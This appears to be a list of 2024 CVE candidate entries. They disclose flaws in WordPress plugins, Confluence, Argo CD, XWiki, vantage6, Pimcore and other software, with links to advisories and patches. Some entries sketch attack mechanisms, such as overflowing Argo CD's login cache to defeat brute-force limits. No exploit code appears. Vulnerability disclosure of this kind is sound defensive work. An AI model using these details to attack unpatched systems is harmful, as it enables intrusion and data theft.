CVE 2024 2172 Candidate The Malware Scanner plugin and the Web Application Firewall plugin for WordPress (both by MiniOrange) are vulnerable to privilege escalation due to a missing capability check on the mo_wpns_init() function in all versions up to, and including, 4.7.2 (for Malware Scanner) and 2.1.1 (for Web Application Firewall). This makes it possible for unauthenticated attackers to escalate their privileges to that of an administrator. MISC:https://plugins.trac.wordpress.org/browser/miniorange-malware-protection/tags/4.7.2/handler/login.php#L89 | URL:https://plugins.trac.wordpress.org/browser/miniorange-malware-protection/tags/4.7.2/handler/login.php#L89 | MISC:https://wordpress.org/plugins/miniorange-malware-protection/ | URL:https://wordpress.org/plugins/miniorange-malware-protection/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6347f588-a3fd-4909-ad57-9d78787b5728?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6347f588-a3fd-4909-ad57-9d78787b5728?source=cve Assigned (20240304)
CVE 2024 2170 Candidate The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the child page index widget in all versions up to, and including, 9.96.0.1 due to insufficient input sanitization and output escaping on user supplied attributes such as 'className.' This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3058212%40vk-all-in-one-expansion-unit&new=3058212%40vk-all-in-one-expansion-unit&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3058212%40vk-all-in-one-expansion-unit&new=3058212%40vk-all-in-one-expansion-unit&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1bc697b3-20f6-46df-a250-f2009a60200e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1bc697b3-20f6-46df-a250-f2009a60200e?source=cve Assigned (20240304)
CVE 2024 2169 Candidate Implementations of UDP application protocol are vulnerable to network loops. An unauthenticated attacker can use maliciously-crafted packets against a vulnerable implementation that can lead to Denial of Service (DOS) and/or abuse of resources. CERT-VN:VU#417980 | URL:https://www.kb.cert.org/vuls/id/417980 | MISC:https://kb.cert.org/vuls/id/417980 | URL:https://kb.cert.org/vuls/id/417980 Assigned (20240304)
CVE 2024 21682 Candidate This High severity Injection vulnerability was introduced in Assets Discovery 1.0 - 6.2.0 (all versions). Assets Discovery, which can be downloaded via Atlassian Marketplace, is a network scanning tool that can be used with or without an agent with Jira Service Management Cloud, Data Center or Server. It detects hardware and software that is connected to your local network and extracts detailed information about each asset. This data can then be imported into Assets in Jira Service Management to help you manage all of the devices and configuration items within your local network. This Injection vulnerability, with a CVSS Score of 7.2, allows an authenticated attacker to modify the actions taken by a system call which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires no user interaction. Atlassian recommends that Assets Discovery customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions See the release notes (https://confluence.atlassian.com/assetapps/assets-discovery-3-2-1-cloud-6-2-1-data_center-1333987182.html). You can download the latest version of Assets Discovery from the Atlassian Marketplace (https://marketplace.atlassian.com/apps/1214668/assets-discovery?hosting=datacenter&tab=installation). This vulnerability was reported via our Penetration Testing program. MISC:https://confluence.atlassian.com/assetapps/assets-discovery-3-2-1-cloud-6-2-1-data_center-1333987182.html | URL:https://confluence.atlassian.com/assetapps/assets-discovery-3-2-1-cloud-6-2-1-data_center-1333987182.html | MISC:https://confluence.atlassian.com/pages/viewpage.action?pageId=1354501606 | URL:https://confluence.atlassian.com/pages/viewpage.action?pageId=1354501606 | MISC:https://jira.atlassian.com/browse/JSDSERVER-15067 | URL:https://jira.atlassian.com/browse/JSDSERVER-15067 | MISC:https://marketplace.atlassian.com/apps/1214668/assets-discovery?hosting=datacenter&tab=installation | URL:https://marketplace.atlassian.com/apps/1214668/assets-discovery?hosting=datacenter&tab=installation Assigned (20240101)
CVE 2024 2168 Candidate A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/operations/expense_category.php of the component HTTP POST Request Handler. The manipulation of the argument status leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-255678 is the identifier assigned to this vulnerability. MISC:VDB-255678 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255678 | MISC:VDB-255678 | SourceCodester Online Tours & Travels Management System HTTP POST Request expense_category.php sql injection | URL:https://vuldb.com/?id.255678 | MISC:https://www.yuque.com/mailemonyeyongjuan/nekc0f/uoobn101h48xv6ih | URL:https://www.yuque.com/mailemonyeyongjuan/nekc0f/uoobn101h48xv6ih Assigned (20240304)
CVE 2024 21678 Candidate This High severity Stored XSS vulnerability was introduced in version 2.7.0 of Confluence Data Center. This Stored XSS vulnerability, with a CVSS Score of 8.5, allows an authenticated attacker to execute arbitrary HTML or JavaScript code on a victims browser which has high impact to confidentiality, low impact to integrity, no impact to availability, and requires no user interaction. Data Center Atlassian recommends that Confluence Data Center customers upgrade to the latest version. If you are unable to do so, upgrade your instance to one of the specified supported fixed versions: ||Affected versions||Fixed versions|| |from 8.7.0 to 8.7.1|8.8.0 recommended or 8.7.2| |from 8.6.0 to 8.6.1|8.8.0 recommended| |from 8.5.0 to 8.5.4 LTS|8.8.0 recommended or 8.5.5 LTS or 8.5.6 LTS| |from 8.4.0 to 8.4.5|8.8.0 recommended or 8.5.6 LTS| |from 8.3.0 to 8.3.4|8.8.0 recommended or 8.5.6 LTS| |from 8.2.0 to 8.2.3|8.8.0 recommended or 8.5.6 LTS| |from 8.1.0 to 8.1.4|8.8.0 recommended or 8.5.6 LTS| |from 8.0.0 to 8.0.4|8.8.0 recommended or 8.5.6 LTS| |from 7.20.0 to 7.20.3|8.8.0 recommended or 8.5.6 LTS| |from 7.19.0 to 7.19.17 LTS|8.8.0 recommended or 8.5.6 LTS or 7.19.18 LTS or 7.19.19 LTS| |from 7.18.0 to 7.18.3|8.8.0 recommended or 8.5.6 LTS or 7.19.19 LTS| |from 7.17.0 to 7.17.5|8.8.0 recommended or 8.5.6 LTS or 7.19.19 LTS| |Any earlier versions|8.8.0 recommended or 8.5.6 LTS or 7.19.19 LTS| Server Atlassian recommends that Confluence Server customers upgrade to the latest 8.5.x LTS version. If you are unable to do so, upgrade your instance to one of the specified supported fixed versions: ||Affected versions||Fixed versions|| |from 8.5.0 to 8.5.4 LTS|8.5.5 LTS or 8.5.6 LTS recommended | |from 8.4.0 to 8.4.5|8.5.6 LTS recommended| |from 8.3.0 to 8.3.4|8.5.6 LTS recommended| |from 8.2.0 to 8.2.3|8.5.6 LTS recommended| |from 8.1.0 to 8.1.4|8.5.6 LTS recommended| |from 8.0.0 to 8.0.4|8.5.6 LTS recommended| |from 7.20.0 to 7.20.3|8.5.6 LTS recommended| |from 7.19.0 to 7.19.17 LTS|8.5.6 LTS recommended or 7.19.18 LTS or 7.19.19 LTS| |from 7.18.0 to 7.18.3|8.5.6 LTS recommended or 7.19.19 LTS| |from 7.17.0 to 7.17.5|8.5.6 LTS recommended or 7.19.19 LTS| |Any earlier versions|8.5.6 LTS recommended or 7.19.19 LTS| See the release notes ([https://confluence.atlassian.com/doc/confluence-release-notes-327.html]). You can download the latest version of Confluence Data Center from the download center ([https://www.atlassian.com/software/confluence/download-archives]). This vulnerability was reported via our Bug Bounty program. MISC:https://confluence.atlassian.com/pages/viewpage.action?pageId=1354501606 | URL:https://confluence.atlassian.com/pages/viewpage.action?pageId=1354501606 | MISC:https://jira.atlassian.com/browse/CONFSERVER-94513 | URL:https://jira.atlassian.com/browse/CONFSERVER-94513 Assigned (20240101)
CVE 2024 21677 Candidate This High severity Path Traversal vulnerability was introduced in version 6.13.0 of Confluence Data Center. This Path Traversal vulnerability, with a CVSS Score of 8.3, allows an unauthenticated attacker to exploit an undefinable vulnerability which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: Data Center Atlassian recommends that Confluence Data Center customers upgrade to the latest version and that Confluence Server customers upgrade to the latest 8.5.x LTS version. If you are unable to do so, upgrade your instance to one of the specified supported fixed versions See the release notes https://confluence.atlassian.com/doc/confluence-release-notes-327.html You can download the latest version of Confluence Data Center and Server from the download center https://www.atlassian.com/software/confluence/download-archives. This vulnerability was reported via our Bug Bounty program. MISC:https://confluence.atlassian.com/pages/viewpage.action?pageId=1369444862 | URL:https://confluence.atlassian.com/pages/viewpage.action?pageId=1369444862 | MISC:https://jira.atlassian.com/browse/CONFSERVER-94604 | URL:https://jira.atlassian.com/browse/CONFSERVER-94604 Assigned (20240101)
CVE 2024 21674 Candidate This High severity Remote Code Execution (RCE) vulnerability was introduced in version 7.13.0 of Confluence Data Center and Server. Remote Code Execution (RCE) vulnerability, with a CVSS Score of 8.6 and a CVSS Vector of CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N allows an unauthenticated attacker to expose assets in your environment susceptible to exploitation which has high impact to confidentiality, no impact to integrity, no impact to availability, and does not require user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: * Confluence Data Center and Server 7.19: Upgrade to a release 7.19.18, or any higher 7.19.x release * Confluence Data Center and Server 8.5: Upgrade to a release 8.5.5 or any higher 8.5.x release * Confluence Data Center and Server 8.7: Upgrade to a release 8.7.2 or any higher release See the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html ). You can download the latest version of Confluence Data Center and Server from the download center (https://www.atlassian.com/software/confluence/download-archives ). MISC:https://jira.atlassian.com/browse/CONFSERVER-94066 | URL:https://jira.atlassian.com/browse/CONFSERVER-94066 Assigned (20240101)
CVE 2024 21673 Candidate This High severity Remote Code Execution (RCE) vulnerability was introduced in versions 7.13.0 of Confluence Data Center and Server. Remote Code Execution (RCE) vulnerability, with a CVSS Score of 8.0 and a CVSS Vector of CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H allows an authenticated attacker to expose assets in your environment susceptible to exploitation which has high impact to confidentiality, high impact to integrity, high impact to availability, and does not require user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: * Confluence Data Center and Server 7.19: Upgrade to a release 7.19.18, or any higher 7.19.x release * Confluence Data Center and Server 8.5: Upgrade to a release 8.5.5 or any higher 8.5.x release * Confluence Data Center and Server 8.7: Upgrade to a release 8.7.2 or any higher release See the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html ). You can download the latest version of Confluence Data Center and Server from the download center (https://www.atlassian.com/software/confluence/download-archives ). MISC:https://jira.atlassian.com/browse/CONFSERVER-94065 | URL:https://jira.atlassian.com/browse/CONFSERVER-94065 Assigned (20240101)
CVE 2024 21672 Candidate This High severity Remote Code Execution (RCE) vulnerability was introduced in version 2.1.0 of Confluence Data Center and Server. Remote Code Execution (RCE) vulnerability, with a CVSS Score of 8.3 and a CVSS Vector of CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H allows an unauthenticated attacker to remotely expose assets in your environment susceptible to exploitation which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: * Confluence Data Center and Server 7.19: Upgrade to a release 7.19.18, or any higher 7.19.x release * Confluence Data Center and Server 8.5: Upgrade to a release 8.5.5 or any higher 8.5.x release * Confluence Data Center and Server 8.7: Upgrade to a release 8.7.2 or any higher release See the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html ). You can download the latest version of Confluence Data Center and Server from the download center (https://www.atlassian.com/software/confluence/download-archives). MISC:https://jira.atlassian.com/browse/CONFSERVER-94064 | URL:https://jira.atlassian.com/browse/CONFSERVER-94064 Assigned (20240101)
CVE 2024 21671 Candidate The vantage6 technology enables to manage and deploy privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). It is possible to find out usernames from the response time of login requests. This could aid attackers in credential attacks. Version 4.2.0 patches this vulnerability. MISC:https://github.com/vantage6/vantage6/commit/389f416c445da4f2438c72f34c3b1084485c4e30 | URL:https://github.com/vantage6/vantage6/commit/389f416c445da4f2438c72f34c3b1084485c4e30 | MISC:https://github.com/vantage6/vantage6/security/advisories/GHSA-45gq-q4xh-cp53 | URL:https://github.com/vantage6/vantage6/security/advisories/GHSA-45gq-q4xh-cp53 Assigned (20231229)
CVE 2024 21670 Candidate Ursa is a cryptographic library for use with blockchains. The revocation schema that is part of the Ursa CL-Signatures implementations has a flaw that could impact the privacy guarantees defined by the AnonCreds verifiable credential model, allowing a malicious holder of a revoked credential to generate a valid Non-Revocation Proof for that credential as part of an AnonCreds presentation. A verifier may verify a credential from a holder as being "not revoked" when in fact, the holder's credential has been revoked. Ursa has moved to end-of-life status and no fix is expected. MISC:https://github.com/hyperledger-archives/ursa/security/advisories/GHSA-r78f-4q2q-hvv4 | URL:https://github.com/hyperledger-archives/ursa/security/advisories/GHSA-r78f-4q2q-hvv4 Assigned (20231229)
CVE 2024 2167 Candidate ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2024-2041. Reason: This candidate is a reservation duplicate of CVE-2024-2041. Notes: All CVE users should reference CVE-2024-2041 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. Assigned (20240304)
CVE 2024 21669 Candidate Hyperledger Aries Cloud Agent Python (ACA-Py) is a foundation for building decentralized identity applications and services running in non-mobile environments. When verifying W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs (LDP-VCs), the result of verifying the presentation `document.proof` was not factored into the final `verified` value (`true`/`false`) on the presentation record. The flaw enables holders of W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs (LDPs) to present incorrectly constructed proofs, and allows malicious verifiers to save and replay a presentation from such holders as their own. This vulnerability has been present since version 0.7.0 and fixed in version 0.10.5. MISC:https://github.com/hyperledger/aries-cloudagent-python/commit/0b01ffffc0789205ac990292f97238614c9fd293 | URL:https://github.com/hyperledger/aries-cloudagent-python/commit/0b01ffffc0789205ac990292f97238614c9fd293 | MISC:https://github.com/hyperledger/aries-cloudagent-python/commit/4c45244e2085aeff2f038dd771710e92d7682ff2 | URL:https://github.com/hyperledger/aries-cloudagent-python/commit/4c45244e2085aeff2f038dd771710e92d7682ff2 | MISC:https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.10.5 | URL:https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.10.5 | MISC:https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.11.0 | URL:https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.11.0 | MISC:https://github.com/hyperledger/aries-cloudagent-python/security/advisories/GHSA-97x9-59rv-q5pm | URL:https://github.com/hyperledger/aries-cloudagent-python/security/advisories/GHSA-97x9-59rv-q5pm Assigned (20231229)
CVE 2024 21668 Candidate react-native-mmkv is a library that allows easy use of MMKV inside React Native applications. Before version 2.11.0, the react-native-mmkv logged the optional encryption key for the MMKV database into the Android system log. The key can be obtained by anyone with access to the Android Debugging Bridge (ADB) if it is enabled in the phone settings. This bug is not present on iOS devices. By logging the encryption secret to the system logs, attackers can trivially recover the secret by enabling ADB and undermining an app's thread model. This issue has been patched in version 2.11.0. MISC:https://github.com/mrousavy/react-native-mmkv/commit/a8995ccb7184281f7d168bad3e9987c9bd05f00d | URL:https://github.com/mrousavy/react-native-mmkv/commit/a8995ccb7184281f7d168bad3e9987c9bd05f00d | MISC:https://github.com/mrousavy/react-native-mmkv/releases/tag/v2.11.0 | URL:https://github.com/mrousavy/react-native-mmkv/releases/tag/v2.11.0 | MISC:https://github.com/mrousavy/react-native-mmkv/security/advisories/GHSA-4jh3-6jhv-2mgp | URL:https://github.com/mrousavy/react-native-mmkv/security/advisories/GHSA-4jh3-6jhv-2mgp Assigned (20231229)
CVE 2024 21667 Candidate pimcore/customer-data-framework is the Customer Management Framework for management of customer data within Pimcore. An authenticated and unauthorized user can access the GDPR data extraction feature and query over the information returned, leading to customer data exposure. Permissions are not enforced when reaching the `/admin/customermanagementframework/gdpr-data/search-data-objects` endpoint allowing an authenticated user without the permissions to access the endpoint and query the data available there. An unauthorized user can access PII data from customers. This vulnerability has been patched in version 4.0.6. MISC:https://github.com/pimcore/customer-data-framework/blob/b4af625ef327c58d05ef7cdf145fa749d2d4195e/src/Controller/Admin/GDPRDataController.php#L38 | URL:https://github.com/pimcore/customer-data-framework/blob/b4af625ef327c58d05ef7cdf145fa749d2d4195e/src/Controller/Admin/GDPRDataController.php#L38 | MISC:https://github.com/pimcore/customer-data-framework/commit/6c34515be2ba39dceee7da07a1abf246309ccd77 | URL:https://github.com/pimcore/customer-data-framework/commit/6c34515be2ba39dceee7da07a1abf246309ccd77 | MISC:https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-g273-wppx-82w4 | URL:https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-g273-wppx-82w4 Assigned (20231229)
CVE 2024 21666 Candidate The Customer Management Framework (CMF) for Pimcore adds functionality for customer data management, segmentation, personalization and marketing automation. An authenticated and unauthorized user can access the list of potential duplicate users and see their data. Permissions are enforced when reaching the `/admin/customermanagementframework/duplicates/list` endpoint allowing an authenticated user without the permissions to access the endpoint and query the data available there. Unauthorized user(s) can access PII data from customers. This vulnerability has been patched in version 4.0.6. MISC:https://github.com/pimcore/customer-data-framework/blob/b4af625ef327c58d05ef7cdf145fa749d2d4195e/src/Controller/Admin/DuplicatesController.php#L43 | URL:https://github.com/pimcore/customer-data-framework/blob/b4af625ef327c58d05ef7cdf145fa749d2d4195e/src/Controller/Admin/DuplicatesController.php#L43 | MISC:https://github.com/pimcore/customer-data-framework/commit/c33c0048390ef0cf98b801d46a81d0762243baa6 | URL:https://github.com/pimcore/customer-data-framework/commit/c33c0048390ef0cf98b801d46a81d0762243baa6 | MISC:https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-c38c-c8mh-vq68 | URL:https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-c38c-c8mh-vq68 Assigned (20231229)
CVE 2024 21665 Candidate ecommerce-framework-bundle is the Pimcore Ecommerce Framework Bundle. An authenticated and unauthorized user can access the back-office orders list and be able to query over the information returned. Access control and permissions are not being enforced. This vulnerability has been patched in version 1.0.10. MISC:https://github.com/pimcore/ecommerce-framework-bundle/blob/ff6ff287b6eb468bb940909c56970363596e5c21/src/Controller/AdminOrderController.php#L98 | URL:https://github.com/pimcore/ecommerce-framework-bundle/blob/ff6ff287b6eb468bb940909c56970363596e5c21/src/Controller/AdminOrderController.php#L98 | MISC:https://github.com/pimcore/ecommerce-framework-bundle/commit/05dec000ed009828084d05cf686f468afd1f464e | URL:https://github.com/pimcore/ecommerce-framework-bundle/commit/05dec000ed009828084d05cf686f468afd1f464e | MISC:https://github.com/pimcore/ecommerce-framework-bundle/releases/tag/v1.0.10 | URL:https://github.com/pimcore/ecommerce-framework-bundle/releases/tag/v1.0.10 | MISC:https://github.com/pimcore/ecommerce-framework-bundle/security/advisories/GHSA-cx99-25hr-5jxf | URL:https://github.com/pimcore/ecommerce-framework-bundle/security/advisories/GHSA-cx99-25hr-5jxf Assigned (20231229)
CVE 2024 21664 Candidate jwx is a Go module implementing various JWx (JWA/JWE/JWK/JWS/JWT, otherwise known as JOSE) technologies. Calling `jws.Parse` with a JSON serialized payload where the `signature` field is present while `protected` is absent can lead to a nil pointer dereference. The vulnerability can be used to crash/DOS a system doing JWS verification. This vulnerability has been patched in versions 2.0.19 and 1.2.28. MISC:https://github.com/lestrrat-go/jwx/commit/0e8802ce6842625845d651456493e7c87625601f | URL:https://github.com/lestrrat-go/jwx/commit/0e8802ce6842625845d651456493e7c87625601f | MISC:https://github.com/lestrrat-go/jwx/commit/8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65 | URL:https://github.com/lestrrat-go/jwx/commit/8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65 | MISC:https://github.com/lestrrat-go/jwx/commit/d69a721931a5c48b9850a42404f18e143704adcd | URL:https://github.com/lestrrat-go/jwx/commit/d69a721931a5c48b9850a42404f18e143704adcd | MISC:https://github.com/lestrrat-go/jwx/security/advisories/GHSA-pvcr-v8j8-j5q3 | URL:https://github.com/lestrrat-go/jwx/security/advisories/GHSA-pvcr-v8j8-j5q3 Assigned (20231229)
CVE 2024 21663 Candidate Discord-Recon is a Discord bot created to automate bug bounty recon, automated scans and information gathering via a discord server. Discord-Recon is vulnerable to remote code execution. An attacker is able to execute shell commands in the server without having an admin role. This vulnerability has been fixed in version 0.0.8. MISC:https://github.com/DEMON1A/Discord-Recon/commit/f9cb0f67177f5e2f1022295ca8e641e47837ec7a | URL:https://github.com/DEMON1A/Discord-Recon/commit/f9cb0f67177f5e2f1022295ca8e641e47837ec7a | MISC:https://github.com/DEMON1A/Discord-Recon/issues/23 | URL:https://github.com/DEMON1A/Discord-Recon/issues/23 | MISC:https://github.com/DEMON1A/Discord-Recon/security/advisories/GHSA-fjcj-g7x8-4rp7 | URL:https://github.com/DEMON1A/Discord-Recon/security/advisories/GHSA-fjcj-g7x8-4rp7 Assigned (20231229)
CVE 2024 21662 Candidate Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Prior to versions 2.8.13, 2.9.9, and 2.10.4, an attacker can effectively bypass the rate limit and brute force protections by exploiting the application's weak cache-based mechanism. This loophole in security can be combined with other vulnerabilities to attack the default admin account. This flaw undermines a patch for CVE-2020-8827 intended to protect against brute-force attacks. The application's brute force protection relies on a cache mechanism that tracks login attempts for each user. This cache is limited to a `defaultMaxCacheSize` of 1000 entries. An attacker can overflow this cache by bombarding it with login attempts for different users, thereby pushing out the admin account's failed attempts and effectively resetting the rate limit for that account. This is a severe vulnerability that enables attackers to perform brute force attacks at an accelerated rate, especially targeting the default admin account. Users should upgrade to version 2.8.13, 2.9.9, or 2.10.4 to receive a patch. MISC:https://argo-cd.readthedocs.io/en/stable/security_considerations/#cve-2020-8827-insufficient-anti-automationanti-brute-force | URL:https://argo-cd.readthedocs.io/en/stable/security_considerations/#cve-2020-8827-insufficient-anti-automationanti-brute-force | MISC:https://github.com/argoproj/argo-cd/commit/17b0df1168a4c535f6f37e95f25ed7cd81e1fa4d | URL:https://github.com/argoproj/argo-cd/commit/17b0df1168a4c535f6f37e95f25ed7cd81e1fa4d | MISC:https://github.com/argoproj/argo-cd/commit/6e181d72b31522f886a2afa029d5b26d7912ec7b | URL:https://github.com/argoproj/argo-cd/commit/6e181d72b31522f886a2afa029d5b26d7912ec7b | MISC:https://github.com/argoproj/argo-cd/commit/cebb6538f7944c87ca2fecb5d17f8baacc431456 | URL:https://github.com/argoproj/argo-cd/commit/cebb6538f7944c87ca2fecb5d17f8baacc431456 | MISC:https://github.com/argoproj/argo-cd/security/advisories/GHSA-2vgg-9h6w-m454 | URL:https://github.com/argoproj/argo-cd/security/advisories/GHSA-2vgg-9h6w-m454 Assigned (20231229)
CVE 2024 21661 Candidate Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Prior to versions 2.8.13, 2.9.9, and 2.10.4, an attacker can exploit a critical flaw in the application to initiate a Denial of Service (DoS) attack, rendering the application inoperable and affecting all users. The issue arises from unsafe manipulation of an array in a multi-threaded environment. The vulnerability is rooted in the application's code, where an array is being modified while it is being iterated over. This is a classic programming error but becomes critically unsafe when executed in a multi-threaded environment. When two threads interact with the same array simultaneously, the application crashes. This is a Denial of Service (DoS) vulnerability. Any attacker can crash the application continuously, making it impossible for legitimate users to access the service. The issue is exacerbated because it does not require authentication, widening the pool of potential attackers. Versions 2.8.13, 2.9.9, and 2.10.4 contain a patch for this issue. MISC:https://github.com/argoproj/argo-cd/blob/54601c8fd30b86a4c4b7eb449956264372c8bde0/util/session/sessionmanager.go#L302-L311 | URL:https://github.com/argoproj/argo-cd/blob/54601c8fd30b86a4c4b7eb449956264372c8bde0/util/session/sessionmanager.go#L302-L311 | MISC:https://github.com/argoproj/argo-cd/commit/2a22e19e06aaf6a1e734443043310a66c234e345 | URL:https://github.com/argoproj/argo-cd/commit/2a22e19e06aaf6a1e734443043310a66c234e345 | MISC:https://github.com/argoproj/argo-cd/commit/5bbb51ab423f273dda74ab956469843d2db2e208 | URL:https://github.com/argoproj/argo-cd/commit/5bbb51ab423f273dda74ab956469843d2db2e208 | MISC:https://github.com/argoproj/argo-cd/commit/ce04dc5c6f6e92033221ec6d96b74403b065ca8b | URL:https://github.com/argoproj/argo-cd/commit/ce04dc5c6f6e92033221ec6d96b74403b065ca8b | MISC:https://github.com/argoproj/argo-cd/security/advisories/GHSA-6v85-wr92-q4p7 | URL:https://github.com/argoproj/argo-cd/security/advisories/GHSA-6v85-wr92-q4p7 Assigned (20231229)
CVE 2024 21655 Candidate Discourse is a platform for community discussion. For fields that are client editable, limits on sizes are not imposed. This allows a malicious actor to cause a Discourse instance to use excessive disk space and also often excessive bandwidth. The issue is patched 3.1.4 and 3.2.0.beta4. MISC:https://github.com/discourse/discourse/security/advisories/GHSA-m5fc-94mm-38fx | URL:https://github.com/discourse/discourse/security/advisories/GHSA-m5fc-94mm-38fx Assigned (20231229)
CVE 2024 21654 Candidate Rubygems.org is the Ruby community's gem hosting service. Rubygems.org users with MFA enabled would normally be protected from account takeover in the case of email account takeover. However, a workaround on the forgotten password form allows an attacker to bypass the MFA requirement and takeover the account. This vulnerability has been patched in commit 0b3272a. MISC:https://github.com/rubygems/rubygems.org/commit/0b3272ac17b45748ee0d1867c49867c7deb26565 | URL:https://github.com/rubygems/rubygems.org/commit/0b3272ac17b45748ee0d1867c49867c7deb26565 | MISC:https://github.com/rubygems/rubygems.org/security/advisories/GHSA-4v23-vj8h-7jp2 | URL:https://github.com/rubygems/rubygems.org/security/advisories/GHSA-4v23-vj8h-7jp2 Assigned (20231229)
CVE 2024 21653 Candidate The vantage6 technology enables to manage and deploy privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). Nodes and servers get a ssh config by default that permits root login with password authentication. In a proper deployment, the SSH service is not exposed so there is no risk, but not all deployments are ideal. The default should therefore be less permissive. The vulnerability can be mitigated by removing the ssh part from the docker file and rebuilding the docker image. Version 4.2.0 patches the vulnerability. MISC:https://github.com/vantage6/vantage6/commit/3fcc6e6a8bd1142fd7a558d8fdd2b246e55c8841 | URL:https://github.com/vantage6/vantage6/commit/3fcc6e6a8bd1142fd7a558d8fdd2b246e55c8841 | MISC:https://github.com/vantage6/vantage6/security/advisories/GHSA-2wgc-48g2-cj5w | URL:https://github.com/vantage6/vantage6/security/advisories/GHSA-2wgc-48g2-cj5w Assigned (20231229)
CVE 2024 21652 Candidate Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Prior to versions 2.8.13, 2.9.9, and 2.10.4, an attacker can exploit a chain of vulnerabilities, including a Denial of Service (DoS) flaw and in-memory data storage weakness, to effectively bypass the application's brute force login protection. This is a critical security vulnerability that allows attackers to bypass the brute force login protection mechanism. Not only can they crash the service affecting all users, but they can also make unlimited login attempts, increasing the risk of account compromise. Versions 2.8.13, 2.9.9, and 2.10.4 contain a patch for this issue. MISC:https://github.com/argoproj/argo-cd/security/advisories/GHSA-x32m-mvfj-52xv | URL:https://github.com/argoproj/argo-cd/security/advisories/GHSA-x32m-mvfj-52xv Assigned (20231229)
CVE 2024 21651 Candidate XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. A user able to attach a file to a page can post a malformed TAR file by manipulating file modification times headers, which when parsed by Tika, could cause a denial of service issue via CPU consumption. This vulnerability has been patched in XWiki 14.10.18, 15.5.3 and 15.8 RC1. MISC:https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-8959-rfxh-r4j4 | URL:https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-8959-rfxh-r4j4 | MISC:https://jira.xwiki.org/browse/XCOMMONS-2796 | URL:https://jira.xwiki.org/browse/XCOMMONS-2796 Assigned (20231229)
CVE 2024 21650 Candidate XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. XWiki is vulnerable to a remote code execution (RCE) attack through its user registration feature. This issue allows an attacker to execute arbitrary code by crafting malicious payloads in the "first name" or "last name" fields during user registration. This impacts all installations that have user registration enabled for guests. This vulnerability has been patched in XWiki 14.10.17, 15.5.3 and 15.8 RC1. MISC:https://github.com/xwiki/xwiki-platform/commit/b290bfd573c6f7db6cc15a88dd4111d9fcad0d31 | URL:https://github.com/xwiki/xwiki-platform/commit/b290bfd573c6f7db6cc15a88dd4111d9fcad0d31 | MISC:https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rj7p-xjv7-7229 | URL:https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rj7p-xjv7-7229 | MISC:https://jira.xwiki.org/browse/XWIKI-21173 | URL:https://jira.xwiki.org/browse/XWIKI-21173 Assigned (20231229)
CVE 2024 21649 Candidate The vantage6 technology enables to manage and deploy privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). Prior to 4.2.0, authenticated users could inject code into algorithm environment variables, resulting in remote code execution. This vulnerability is patched in 4.2.0. MISC:https://github.com/vantage6/vantage6/commit/eac19db737145d3ca987adf037a454fae0790ddd | URL:https://github.com/vantage6/vantage6/commit/eac19db737145d3ca987adf037a454fae0790ddd | MISC:https://github.com/vantage6/vantage6/security/advisories/GHSA-w9h2-px87-74vx | URL:https://github.com/vantage6/vantage6/security/advisories/GHSA-w9h2-px87-74vx Assigned (20231229)
